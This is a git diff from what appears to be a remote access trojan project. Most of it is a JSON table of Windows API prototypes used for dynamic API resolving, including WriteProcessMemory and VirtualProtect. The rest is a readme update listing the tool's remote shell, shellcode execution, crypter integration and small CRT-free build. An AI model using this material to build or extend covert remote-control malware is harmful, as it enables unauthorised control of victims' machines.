DWORD flAllocationType, DWORD flProtect);" + }, + { + "function_name": "VirtualFree", + "arguments": [ + "LPVOID", + "DWORD", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL VirtualFree(LPVOID lpvAddress, DWORD cbSize, DWORD fdwFreeType);" + }, + { + "function_name": "VirtualFreeEx", + "arguments": [ + "HANDLE", + "LPVOID", + "SIZE_T", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL VirtualFreeEx(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType);" + }, + { + "function_name": "VirtualLock", + "arguments": [ + "LPVOID", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL VirtualLock(LPVOID lpvAddress, DWORD cbSize);" + }, + { + "function_name": "VirtualProtect", + "arguments": [ + "LPVOID", + "DWORD", + "DWORD", + "PDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL VirtualProtect(LPVOID lpvAddress,DWORD cbSize, DWORD fdwNewProtect, PDWORD pfdwOldProtect);" + }, + { + "function_name": "VirtualProtectEx", + "arguments": [ + "HANDLE", + "LPVOID", + "DWORD", + "DWORD", + "PDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL VirtualProtectEx(HANDLE hProcess, LPVOID lpvAddress, DWORD cbSize,DWORD fdwNewProtect,PDWORD pfdwOldProtect);" + }, + { + "function_name": "VirtualQuery", + "arguments": [ + "LPCVOID", + "PMEMORY_BASIC_INFORMATION", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD VirtualQuery(LPCVOID lpvAddress,PMEMORY_BASIC_INFORMATION pmbiBuffer, DWORD cbLength);" + }, + { + "function_name": "VirtualQueryEx", + "arguments": [ + "HANDLE", + "LPCVOID", + "PMEMORY_BASIC_INFORMATION", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD VirtualQueryEx(HANDLE hProcess, LPCVOID lpvAddress, PMEMORY_BASIC_INFORMATION pmbiBuffer,DWORD cbLength);" + }, + { + "function_name": "VirtualUnlock", + "arguments": [ + "LPVOID", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL VirtualUnlock(LPVOID lpvAddress, DWORD cbSize);" + }, + { + "function_name": "VkKeyScanA", + "arguments": [ + "TCHAR" + ], + "dll_name": "user32.dll", + "full_prototype": "SHORT VkKeyScanA(TCHAR ch);" + }, + { + "function_name": "VkKeyScanExA", + "arguments": [ + "UINT", + "HKL" + ], + "dll_name": "user32.dll", + "full_prototype": "SHORT VkKeyScanExA(UINT uChar, HKL hkl);" + }, + { + "function_name": "VkKeyScanExW", + "arguments": [ + "WCHAR", + "HKL" + ], + "dll_name": "user32.dll", + "full_prototype": "SHORT VkKeyScanExW(WCHAR uChar, HKL hkl);" + }, + { + "function_name": "VkKeyScanW", + "arguments": [ + "WCHAR" + ], + "dll_name": "user32.dll", + "full_prototype": "SHORT VkKeyScanW(WCHAR ch);" + }, + { + "function_name": "WaitCommEvent", + "arguments": [ + "HANDLE", + "LPDWORD", + "LPOVERLAPPED" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL WaitCommEvent(HANDLE hCommDev, LPDWORD lpfdwEvtMask, LPOVERLAPPED lpo);" + }, + { + "function_name": "WaitForDebugEvent", + "arguments": [ + "LPDEBUG_EVENT", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL WaitForDebugEvent(LPDEBUG_EVENT lpde, DWORD dwTimeout);" + }, + { + "function_name": "WaitForInputIdle", + "arguments": [ + "HANDLE", + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "DWORD WaitForInputIdle(HANDLE hProcess, DWORD dwTimeout);" + }, + { + "function_name": "WaitForMultipleObjects", + "arguments": [ + "DWORD", + "CONST HANDLE *", + "BOOL", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD WaitForMultipleObjects(DWORD cObjects, CONST HANDLE * lphObjects,BOOL fWaitAll, DWORD dwTimeout);" + }, + { + "function_name": "WaitForMultipleObjectsEx", + "arguments": [ + "DWORD", + "CONST HANDLE *", + "BOOL", + "DWORD", + "BOOL" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD WaitForMultipleObjectsEx(DWORD cObjects, CONST HANDLE * lphObjects, BOOL fWaitAll, DWORD dwTimeout, BOOL fAlertable);" + }, + { + "function_name": "WaitForSingleObject", + "arguments": [ + "HANDLE", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD WaitForSingleObject( HANDLE hObject,DWORD dwTimeout );" + }, + { + "function_name": "WaitForSingleObjectEx", + "arguments": [ + "HANDLE", + "DWORD", + "BOOL" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD WaitForSingleObjectEx(HANDLE hObject, DWORD dwTimeout, BOOL fAlertable);" + }, + { + "function_name": "WaitMessage", + "arguments": [ + "" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL WaitMessage(VOID);" + }, + { + "function_name": "WaitNamedPipeA", + "arguments": [ + "LPCTSTR", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL WaitNamedPipeA(LPCTSTR lpszPipeName, DWORD dwTimeout);" + }, + { + "function_name": "WaitNamedPipeW", + "arguments": [ + "LPCWSTR", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL WaitNamedPipeW(LPCWSTR name, DWORD nTimeOut);" + }, + { + "function_name": "waveOutGetNumDevs", + "arguments": [ + "" + ], + "dll_name": "winmm.dll", + "full_prototype": "UINT waveOutGetNumDevs(VOID);" + }, + { + "function_name": "WideCharToMultiByte", + "arguments": [ + "UINT", + "DWORD", + "LPCWSTR", + "int", + "LPSTR", + "int", + "LPCSTR", + "LPBOOL" + ], + "dll_name": "kernel32.dll", + "full_prototype": "int WideCharToMultiByte(UINT CodePage, DWORD dwFlags, LPCWSTR lpWideCharStr,int cchWideChar,LPSTR lpMultiByteStr, int cchMultiByte,LPCSTR lpDefaultChar, LPBOOL lpUsedDefaultChar);" + }, + { + "function_name": "WidenPath", + "arguments": [ + "HDC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL WidenPath(HDC hdc);" + }, + { + "function_name": "WindowFromDC", + "arguments": [ + "HDC" + ], + "dll_name": "user32.dll", + "full_prototype": "HWND WindowFromDC(HDC hdc);" + }, + { + "function_name": "WindowFromPoint", + "arguments": [ + "POINT" + ], + "dll_name": "user32.dll", + "full_prototype": "HWND WindowFromPoint(POINT pt);" + }, + { + "function_name": "WinExec", + "arguments": [ + "LPCSTR", + "UINT" + ], + "dll_name": "kernel32.dll", + "full_prototype": "UINT WinExec( LPCSTR lpszCmdLine, UINT fuCmdShow );" + }, + { + "function_name": "WinHelpA", + "arguments": [ + "HWND", + "LPCTSTR", + "UINT", + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL WinHelpA(HWND hwnd, LPCTSTR lpszHelp, UINT uCommand, DWORD dwData);" + }, + { + "function_name": "WinHelpW", + "arguments": [ + "HWND", + "LPCTSTR", + "UINT", + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL WinHelpW(HWND hwnd, LPCTSTR lpszHelp, UINT uCommand, DWORD dwData);" + }, + { + "function_name": "WNetAddConnection2A", + "arguments": [ + "LPNETRESOURCE", + "LPCTSTR", + "LPCTSTR", + "DWORD" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD WNetAddConnection2A(LPNETRESOURCE lpNetResource,LPCTSTR lpPassword, LPCTSTR lpUsername, DWORD fdwConnection);" + }, + { + "function_name": "WNetAddConnection2W", + "arguments": [ + "LPNETRESOURCEW", + "LPCWSTR", + "LPCWSTR", + "DWORD" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD WNetAddConnection2W(LPNETRESOURCEW lpNetResource, LPCWSTR lpPassword, LPCWSTR lpUsername, DWORD fdwConnection);" + }, + { + "function_name": "WNetAddConnection3A", + "arguments": [ + "HWND", + "LPNETRESOURCE", + "LPTSTR", + "LPTSTR", + "DWORD" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD WNetAddConnection3A(HWND hwndOwner, LPNETRESOURCE lpNetResource, LPTSTR lpPassword, LPTSTR lpUserName, DWORD fdwConnection);" + }, + { + "function_name": "WNetAddConnection3W", + "arguments": [ + "HWND", + "LPNETRESOURCEW", + "LPCWSTR", + "LPCWSTR", + "DWORD" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD WNetAddConnection3W(HWND hwndOwner, LPNETRESOURCEW lpNetResource, LPCWSTR lpPassword, LPCWSTR lpUserName, DWORD fdwConnection);" + }, + { + "function_name": "WNetAddConnectionA", + "arguments": [ + "LPTSTR", + "LPTSTR", + "LPTSTR" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD WNetAddConnectionA(LPTSTR lpszRemoteName, LPTSTR lpszPassword,LPTSTR lpszLocalName);" + }, + { + "function_name": "WNetAddConnectionW", + "arguments": [ + "LPCWSTR", + "LPCWSTR", + "LPCWSTR" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD WNetAddConnectionW(LPCWSTR lpszRemoteName, LPCWSTR lpszPassword, LPCWSTR lpszLocalName);" + }, + { + "function_name": "WNetCancelConnection2A", + "arguments": [ + "LPTSTR", + "DWORD", + "BOOL" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD WNetCancelConnection2A(LPTSTR lpszName,DWORD fdwConnection, BOOL fForce);" + }, + { + "function_name": "WNetCancelConnection2W", + "arguments": [ + "LPCWSTR", + "DWORD", + "BOOL" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD WNetCancelConnection2W(LPCWSTR lpszName, DWORD fdwConnection, BOOL fForce);" + }, + { + "function_name": "WNetCancelConnectionA", + "arguments": [ + "LPTSTR", + "BOOL" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD WNetCancelConnectionA(LPTSTR lpszName, BOOL fForce);" + }, + { + "function_name": "WNetCancelConnectionW", + "arguments": [ + "LPCWSTR", + "BOOL" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD WNetCancelConnectionW(LPCWSTR lpszName, BOOL fForce);" + }, + { + "function_name": "WNetCloseEnum", + "arguments": [ + "HANDLE" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD WNetCloseEnum(HANDLE hEnum);" + }, + { + "function_name": "WNetConnectionDialog", + "arguments": [ + "HWND", + "DWORD" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD WNetConnectionDialog( HWND hwnd,DWORD fdwResourceType );" + }, + { + "function_name": "WNetConnectionDialog1A", + "arguments": [ + "LPCONNECTDLGSTRUCT" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD WNetConnectionDialog1A(LPCONNECTDLGSTRUCT lpConnDlgStruct);" + }, + { + "function_name": "WNetConnectionDialog1W", + "arguments": [ + "LPCONNECTDLGSTRUCTW" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD WNetConnectionDialog1W(LPCONNECTDLGSTRUCTW lpConnDlgStruct);" + }, + { + "function_name": "WNetDisconnectDialog", + "arguments": [ + "HWND", + "DWORD" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD WNetDisconnectDialog( HWND hwnd,DWORD fdwResourceType );" + }, + { + "function_name": "WNetDisconnectDialog1A", + "arguments": [ + "LPDISCDLGSTRUCT" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD WNetDisconnectDialog1A(LPDISCDLGSTRUCT lpConnDlgStruct);" + }, + { + "function_name": "WNetDisconnectDialog1W", + "arguments": [ + "LPDISCDLGSTRUCTW" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD WNetDisconnectDialog1W(LPDISCDLGSTRUCTW lpConnDlgStruct);" + }, + { + "function_name": "WNetEnumResourceA", + "arguments": [ + "HANDLE", + "LPDWORD", + "LPVOID", + "LPDWORD" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD WNetEnumResourceA(HANDLE hEnum, LPDWORD lpcEntries, LPVOID lpvBuffer, LPDWORD lpcbBuffer);" + }, + { + "function_name": "WNetEnumResourceW", + "arguments": [ + "HANDLE", + "LPDWORD", + "LPVOID", + "LPDWORD" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD WNetEnumResourceW(HANDLE hEnum, LPDWORD lpcEntries, LPVOID lpvBuffer, LPDWORD lpcbBuffer);" + }, + { + "function_name": "WNetGetConnectionA", + "arguments": [ + "LPTSTR", + "LPTSTR", + "LPDWORD" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD WNetGetConnectionA(LPTSTR lpszLocalName, LPTSTR lpszRemoteName, LPDWORD lpcchBuffer);" + }, + { + "function_name": "WNetGetConnectionW", + "arguments": [ + "LPCWSTR", + "LPWSTR", + "LPDWORD" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD WNetGetConnectionW(LPCWSTR lpszLocalName, LPWSTR lpszRemoteName, LPDWORD lpcchBuffer);" + }, + { + "function_name": "WNetGetLastErrorA", + "arguments": [ + "LPDWORD", + "LPTSTR", + "DWORD", + "LPTSTR", + "DWORD" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD WNetGetLastErrorA(LPDWORD lpdwErrorCode,LPTSTR lpszDescription, DWORD cchDescription, LPTSTR lpszName, DWORD cchName);" + }, + { + "function_name": "WNetGetLastErrorW", + "arguments": [ + "LPDWORD", + "LPWSTR", + "DWORD", + "LPWSTR", + "DWORD" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD WNetGetLastErrorW(LPDWORD lpdwErrorCode,LPWSTR lpszDescription, DWORD cchDescription, LPWSTR lpszName, DWORD cchName);" + }, + { + "function_name": "WNetGetNetworkInformationA", + "arguments": [ + "LPCTSTR", + "LPNETINFOSTRUCT" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD WNetGetNetworkInformationA(LPCTSTR lpProvider, LPNETINFOSTRUCT lpNetInfoStruct);" + }, + { + "function_name": "WNetGetNetworkInformationW", + "arguments": [ + "LPCWSTR", + "LPNETINFOSTRUCT" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD WNetGetNetworkInformationW(LPCWSTR lpProvider, LPNETINFOSTRUCT lpNetInfoStruct);" + }, + { + "function_name": "WNetGetProviderNameA", + "arguments": [ + "DWORD", + "LPTSTR", + "LPDWORD" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD WNetGetProviderNameA(DWORD dwNetType, LPTSTR lpProviderName, LPDWORD lpBufferSize);" + }, + { + "function_name": "WNetGetProviderNameW", + "arguments": [ + "DWORD", + "LPWSTR", + "LPDWORD" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD WNetGetProviderNameW(DWORD dwNetType, LPWSTR lpProviderName, LPDWORD lpBufferSize);" + }, + { + "function_name": "WNetGetResourceParentA", + "arguments": [ + "LPNETRESOURCE", + "LPVOID", + "LPDWORD" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD WNetGetResourceParentA(LPNETRESOURCE lpNetResource, LPVOID lpBuffer, LPDWORD lpBufferSize);" + }, + { + "function_name": "WNetGetResourceParentW", + "arguments": [ + "LPNETRESOURCEW", + "LPVOID", + "LPDWORD" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD WNetGetResourceParentW(LPNETRESOURCEW lpNetResource, LPVOID lpBuffer, LPDWORD lpBufferSize);" + }, + { + "function_name": "WNetGetUniversalNameA", + "arguments": [ + "LPCTSTR", + "DWORD", + "LPVOID", + "LPDWORD" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD WNetGetUniversalNameA(LPCTSTR lpLocalPath, DWORD dwInfoLevel, LPVOID lpBuffer,LPDWORD lpBufferSize);" + }, + { + "function_name": "WNetGetUniversalNameW", + "arguments": [ + "LPCWSTR", + "DWORD", + "LPVOID", + "LPDWORD" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD WNetGetUniversalNameW(LPCWSTR lpLocalPath, DWORD dwInfoLevel, LPVOID lpBuffer,LPDWORD lpBufferSize);" + }, + { + "function_name": "WNetGetUserA", + "arguments": [ + "LPTSTR", + "LPTSTR", + "LPDWORD" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD WNetGetUserA(LPTSTR lpszLocalName,LPTSTR lpszUserName,LPDWORD lpcchBuffer);" + }, + { + "function_name": "WNetGetUserW", + "arguments": [ + "LPCWSTR", + "LPWSTR", + "LPDWORD" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD WNetGetUserW(LPCWSTR lpszLocalName, LPWSTR lpszUserName,LPDWORD lpcchBuffer);" + }, + { + "function_name": "WNetOpenEnumA", + "arguments": [ + "DWORD", + "DWORD", + "DWORD", + "LPNETRESOURCE", + "LPHANDLE" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD WNetOpenEnumA(DWORD fdwScope, DWORD fdwType, DWORD fdwUsage, LPNETRESOURCE lpNetResource, LPHANDLE lphEnum);" + }, + { + "function_name": "WNetOpenEnumW", + "arguments": [ + "DWORD", + "DWORD", + "DWORD", + "LPNETRESOURCEW", + "LPHANDLE" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD WNetOpenEnumW(DWORD fdwScope, DWORD fdwType, DWORD fdwUsage, LPNETRESOURCEW lpNetResource, LPHANDLE lphEnum);" + }, + { + "function_name": "WNetSetConnectionA", + "arguments": [ + "LPCTSTR", + "DWORD", + "LPVOID" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD WNetSetConnectionA(LPCTSTR lpName, DWORD dwProperty, LPVOID pvValue);" + }, + { + "function_name": "WNetSetConnectionW", + "arguments": [ + "LPCWSTR", + "DWORD", + "LPVOID" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD WNetSetConnectionW(LPCWSTR lpName, DWORD dwProperty, LPVOID pvValue);" + }, + { + "function_name": "WNetUseConnectionA", + "arguments": [ + "HWND", + "LPNETRESOURCE", + "LPCTSTR", + "LPCTSTR", + "DWORD", + "LPTSTR", + "LPDWORD", + "LPDWORD" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD WNetUseConnectionA(HWND hwndOwner, LPNETRESOURCE lpNetResource, LPCTSTR lpPassword, LPCTSTR lpUserID, DWORD dwFlags, LPTSTR lpAccessName, LPDWORD lpBufferSize, LPDWORD lpResult);" + }, + { + "function_name": "WNetUseConnectionW", + "arguments": [ + "HWND", + "LPNETRESOURCEW", + "LPCWSTR", + "LPCWSTR", + "DWORD", + "LPWSTR", + "LPDWORD", + "LPDWORD" + ], + "dll_name": "mpr.dll", + "full_prototype": "DWORD WNetUseConnectionW(HWND hwndOwner, LPNETRESOURCEW lpNetResource, LPCWSTR lpPassword, LPCWSTR lpUserID, DWORD dwFlags, LPWSTR lpAccessName, LPDWORD lpBufferSize, LPDWORD lpResult);" + }, + { + "function_name": "WriteConsoleA", + "arguments": [ + "HANDLE", + "CONST VOID", + "DWORD", + "LPDWORD", + "LPVOID" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL WriteConsoleA(HANDLE hConsoleOutput, CONST VOID *lpvBuffer, DWORD cchToWrite, LPDWORD lpcchWritten, LPVOID lpvReserved);" + }, + { + "function_name": "WriteConsoleW", + "arguments": [ + "HANDLE", + "CONST VOID", + "DWORD", + "LPDWORD", + "LPVOID" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL WriteConsoleW(HANDLE hConsoleOutput, CONST VOID *lpvBuffer, DWORD cchToWrite, LPDWORD lpcchWritten, LPVOID lpvReserved);" + }, + { + "function_name": "WriteConsoleInputA", + "arguments": [ + "HANDLE", + "PINPUT_RECORD", + "DWORD", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL WriteConsoleInputA(HANDLE hConsoleInput,PINPUT_RECORD pirBuffer, DWORD cInRecords, LPDWORD lpcWritten);" + }, + { + "function_name": "WriteConsoleInputW", + "arguments": [ + "HANDLE", + "CONST INPUT_RECORD", + "DWORD", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL WriteConsoleInputW(HANDLE hConsoleInput, CONST INPUT_RECORD *lpBuffer, DWORD nLength, LPDWORD lpNumberOfEventsWritten);" + }, + { + "function_name": "WriteConsoleOutputA", + "arguments": [ + "HANDLE", + "PCHAR_INFO", + "COORD", + "COORD", + "PSMALL_RECT" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL WriteConsoleOutputA(HANDLE hConsoleOutput, PCHAR_INFO pchiSrcBuffer,COORD coordSrcBufferSize, COORD coordSrcBufferCoord, PSMALL_RECT psrctDestRect);" + }, + { + "function_name": "WriteConsoleOutputW", + "arguments": [ + "HANDLE", + "PCHAR_INFO", + "COORD", + "COORD", + "PSMALL_RECT" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL WriteConsoleOutputW(HANDLE hConsoleOutput, PCHAR_INFO pchiSrcBuffer,COORD coordSrcBufferSize, COORD coordSrcBufferCoord, PSMALL_RECT psrctDestRect);" + }, + { + "function_name": "WriteConsoleOutputAttribute", + "arguments": [ + "HANDLE", + "LPWORD", + "DWORD", + "COORD", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL WriteConsoleOutputAttribute(HANDLE hConsoleOutput, LPWORD lpwAttribute, DWORD cWriteCells,COORD coordWrite, LPDWORD lpcWritten);" + }, + { + "function_name": "WriteConsoleOutputCharacterA", + "arguments": [ + "HANDLE", + "LPTSTR", + "DWORD", + "COORD", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL WriteConsoleOutputCharacterA(HANDLE hConsoleOutput, LPTSTR lpWriteBuffer,DWORD cchWrite,COORD coordWriteCoord, LPDWORD lpcWritten);" + }, + { + "function_name": "WriteConsoleOutputCharacterW", + "arguments": [ + "HANDLE", + "LPCWSTR", + "DWORD", + "COORD", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL WriteConsoleOutputCharacterW(HANDLE hConsoleOutput, LPCWSTR str, DWORD length, COORD coord, LPDWORD lpNumCharsWritten);" + }, + { + "function_name": "WriteFile", + "arguments": [ + "HANDLE", + "LPCVOID", + "DWORD", + "LPDWORD", + "LPOVERLAPPED" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL WriteFile(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped);" + }, + { + "function_name": "WriteFileEx", + "arguments": [ + "HANDLE", + "LPCVOID", + "DWORD", + "LPOVERLAPPED", + "LPOVERLAPPED_COMPLETION_ROUTINE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL WriteFileEx(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPOVERLAPPED lpOverlapped,LPOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine);" + }, + { + "function_name": "WritePrivateProfileSectionA", + "arguments": [ + "LPCTSTR", + "LPCTSTR", + "LPCTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL WritePrivateProfileSectionA(LPCTSTR lpszSection, LPCTSTR lpszKeysAndValues, LPCTSTR lpszFile);" + }, + { + "function_name": "WritePrivateProfileSectionW", + "arguments": [ + "LPCWSTR", + "LPCWSTR", + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL WritePrivateProfileSectionW(LPCWSTR section, LPCWSTR string, LPCWSTR filename);" + }, + { + "function_name": "WritePrivateProfileStringA", + "arguments": [ + "LPCTSTR", + "LPCTSTR", + "LPCTSTR", + "LPCTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL WritePrivateProfileStringA(LPCTSTR lpszSection, LPCTSTR lpszKey, LPCTSTR lpszString,LPCTSTR lpszFile);" + }, + { + "function_name": "WritePrivateProfileStringW", + "arguments": [ + "LPCWSTR", + "LPCWSTR", + "LPCWSTR", + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL WritePrivateProfileStringW(LPCWSTR lpszSection, LPCWSTR lpszKey, LPCWSTR lpszString, LPCWSTR lpszFile);" + }, + { + "function_name": "WriteProcessMemory", + "arguments": [ + "HANDLE", + "LPVOID", + "LPVOID", + "DWORD", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL WriteProcessMemory(HANDLE hProcess, LPVOID lpBaseAddress, LPVOID lpBuffer, DWORD cbWrite, LPDWORD lpNumberOfBytesWritten);" + }, + { + "function_name": "WriteProfileSectionA", + "arguments": [ + "LPCTSTR", + "LPCTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL WriteProfileSectionA(LPCTSTR lpszSection, LPCTSTR lpszKeysAndValues);" + }, + { + "function_name": "WriteProfileSectionW", + "arguments": [ + "LPCWSTR", + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL WriteProfileSectionW(LPCWSTR lpszSection, LPCWSTR lpszKeysAndValues);" + }, + { + "function_name": "WriteProfileStringA", + "arguments": [ + "LPCTSTR", + "LPCTSTR", + "LPCTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL WriteProfileStringA(LPCTSTR lpszSection, LPCTSTR lpszKey,LPCTSTR lpszString);" + }, + { + "function_name": "WriteProfileStringW", + "arguments": [ + "LPCWSTR", + "LPCWSTR", + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL WriteProfileStringW(LPCWSTR section, LPCWSTR entry, LPCWSTR string);" + }, + { + "function_name": "WriteTapemark", + "arguments": [ + "HANDLE", + "DWORD", + "DWORD", + "BOOL" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD WriteTapemark(HANDLE hDevice, DWORD dwTapemarkType, DWORD dwTapemarkCount, BOOL bImmediate);" + }, + { + "function_name": "wsprintfA", + "arguments": [ + "LPTSTR", + "LPCTSTR", + "" + ], + "dll_name": "user32.dll", + "full_prototype": "int wsprintfA(LPTSTR lpOut, LPCTSTR lpFmt, ...);" + }, + { + "function_name": "wsprintfW", + "arguments": [ + "LPWSTR", + "LPCWSTR", + "" + ], + "dll_name": "user32.dll", + "full_prototype": "int wsprintfW(LPWSTR lpOut, LPCWSTR lpFmt, ...);" + }, + { + "function_name": "wvsprintfA", + "arguments": [ + "LPTSTR", + "LPCTSTR", + "va_list" + ], + "dll_name": "user32.dll", + "full_prototype": "int wvsprintfA(LPTSTR lpOutput, LPCTSTR lpFormat, va_list arglist);" + }, + { + "function_name": "wvsprintfW", + "arguments": [ + "LPWSTR", + "LPCWSTR", + "va_list" + ], + "dll_name": "user32.dll", + "full_prototype": "int wvsprintfW(LPWSTR lpOutput, LPCWSTR lpFormat, va_list arglist);" + }, + { + "function_name": "_hread", + "arguments": [ + "HFILE", + "LPVOID", + "long" + ], + "dll_name": "kernel32.dll", + "full_prototype": "long _hread(HFILE hFile, LPVOID lpBuffer, long lBytes);" + }, + { + "function_name": "_hwrite", + "arguments": [ + "HFILE", + "LPCSTR", + "long" + ], + "dll_name": "kernel32.dll", + "full_prototype": "long _hwrite(HFILE hFile, LPCSTR lpBuffer, long lBytes);" + }, + { + "function_name": "_lclose", + "arguments": [ + "HFILE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HFILE _lclose(HFILE hFile);" + }, + { + "function_name": "_lcreat", + "arguments": [ + "LPCSTR", + "int" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HFILE _lcreat(LPCSTR lpPathName, int iAttribute);" + }, + { + "function_name": "_llseek", + "arguments": [ + "HFILE", + "LONG", + "int" + ], + "dll_name": "kernel32.dll", + "full_prototype": "LONG _llseek(HFILE hFile, LONG lOffset,int iOrigin );" + }, + { + "function_name": "_lopen", + "arguments": [ + "LPCSTR", + "int" + ], + "dll_name": "kernel32.dll", + "full_prototype": "HFILE _lopen(LPCSTR lpPathName, int iReadWrite);" + }, + { + "function_name": "_lread", + "arguments": [ + "HFILE", + "LPVOID", + "UINT" + ], + "dll_name": "kernel32.dll", + "full_prototype": "UINT _lread(HFILE hFile, LPVOID lpBuffer, UINT uBytes);" + }, + { + "function_name": "_lwrite", + "arguments": [ + "HFILE", + "LPCSTR", + "UINT" + ], + "dll_name": "kernel32.dll", + "full_prototype": "UINT _lwrite(HFILE hFile, LPCSTR lpBuffer, UINT uBytes);" + } +] \ No newline at end of file diff --git a/readme.md b/readme.md index bb34836..9d33a9d 100644 --- a/readme.md +++ b/readme.md @@ -9,9 +9,10 @@ A very simple RAT I created for fun.
* File explorer (download/upload/remove/execute) * Shellcode execution * Server builder supports [patate-crypter](https://github.com/ALittlePatate/patate-crypter) inetgration +* [pasm](https://github.com/ALittlePatate/patate-crypter) integration in the agent ## Characteristics -* Small (17ko) (can go lower) +* Small (26ko) * Made in C, no CRT * x32 bit * Dynamic API resolving @@ -32,11 +33,15 @@ A very simple RAT I created for fun.
* Can build the client * File explorer GUI (upload/download/remove/execute) * Remote shell GUI +* PASM code editor
TODO * Dark theme +* colors in IDE +* lines number in IDE +* close warning in IDE * Plugins support
@@ -44,4 +49,5 @@ A very simple RAT I created for fun.
![Alt text](Screenshots/main_menu.png "main menu") ![Alt text](Screenshots/builder.png "builder") ![Alt text](Screenshots/shell.png "shell") -![Alt text](Screenshots/fex.png "file explorer") \ No newline at end of file +![Alt text](Screenshots/fex.png "file explorer") +![Alt text](Screenshots/pasm_editor.png "pasm editor") \ No newline at end of file